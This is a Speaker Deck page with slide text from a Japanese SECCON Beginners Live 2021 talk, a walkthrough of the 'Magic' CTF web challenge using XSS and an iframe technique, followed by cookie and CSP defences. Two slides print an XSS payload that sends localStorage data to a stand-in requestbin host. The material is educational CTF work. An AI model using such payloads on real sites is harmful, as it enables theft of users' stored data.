Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

Hi120ki
October 17, 2021
Technology
0
1k

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/

Hi120ki

October 17, 2021
Tweet

More Decks by Hi120ki

See All by Hi120ki
SECCON13 - SECCON Beginners Workshop - Reversing
hi120ki
0
85
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.4k

Other Decks in Technology

See All in Technology
LLM とプロンプトエンジニアリング/チューターをビルドする / LLM, Prompt Engineering and Building Tutors
ks91
PRO
1
220
フロントエンドも盛り上げたい!フロントエンドCBとAmplifyの軌跡
mkdev10
2
250
Стильный код: натуральный поиск редких атрибутов по картинке. Юлия Антохина, Data Scientist, Lamoda Tech
lamodatech
0
480
GitHub MCP Serverを使って Pull Requestを作る、レビューする
hiyokose
2
720
LangfuseでAIエージェントの 可観測性を高めよう!/Enhancing AI Agent Observability with Langfuse!
jnymyk
0
180
Classmethod AI Talks(CATs) #21 司会進行スライド(2025.04.17) / classmethod-ai-talks-aka-cats_moderator-slides_vol21_2025-04-17
shinyaa31
0
470
「それはhowなんよ〜」のガイドライン #orestudy
77web
9
2.4k
2025年春に見直したい、リソース最適化の基本
sogaoh
PRO
0
470
【2025年度新卒技術研修】100分で学ぶ サイバーエージェントのデータベース 活用事例とMySQLパフォーマンス調査
cyberagentdevelopers
PRO
5
6.7k
20250411_HCCJP_AdaptiveCloudUpdates.pdf
sdosamut
1
100
バックオフィス向け toB SaaS バクラクにおけるレコメンド技術活用 / recommender-systems-in-layerx-bakuraku
yuya4
3
330
All You Need Is Kusa 〜Slackデータで始めるデータドリブン〜
jonnojun
0
140

Featured

See All Featured
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
5
520
Done Done
chrislema
183
16k
How to Ace a Technical Interview
jacobian
276
23k
The Art of Programming - Codeland 2020
erikaheidi
53
13k
GitHub's CSS Performance
jonrohan
1030
460k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
160
15k
Documentation Writing (for coders)
carmenintech
69
4.7k
Adopting Sorbet at Scale
ufuk
76
9.3k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
52
2.4k
We Have a Design System, Now What?
morganepeng
52
7.5k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.5k
Large-scale JavaScript Application Architecture
addyosmani
512
110k

Transcript

  1. Magic Web SECCON Beginners Live 2021 hi120ki

  2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

    firmware Web : json, magic

  3. Web Magic 3

  4. Magic [Web Hard] : 31solve Web 5 • • 4

  5. 5 /

  6. 6 /

  7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  8. 8 / URL

  9. 9 /

  10. 10 crawler/index.js puppeteer Node.js Chrome URL

  11. 11 2. FLAG 3. URL crawler/index.js 1.

  12. 12 FLAG nginx/html/static/index.js FLAG

  13. 13 FLAG JavaScript XSS( )

  14. XSS 14 HTML Web HTML JavaScript Cookie Web

  15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

  16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

  17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

  18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

  19. XSS 19 magic/views/index.ejs <script> </script>

  20. 20 alert(1)

  21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

  22. 22 FLAG URL

  23. 23 XSS https://magic.quals.beginners.seccon.jp/

  24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

  25. 25 ... + = ? XSS

  26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

  27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  28. 28 URL

  29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

  30. 30 FLAG 1. FLAG 2. 3.

  31. 31

  32. 1. XSS 2. 3. 32

  33. 1. XSS 2. 3. 33 FLAG

  34. 1. XSS 2. 3. 34

  35. 1. XSS 2. 3. 35

  36. 36 FLAG

  37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

  38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

  39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

  40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

  41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

  42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

  43. 43 iframe SameSite Cookie None Lax

  44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

  45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

  46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

  47. 47 SameSite Cookie=None iframe CTF

  48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

  49. 49 FLAG +

  50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/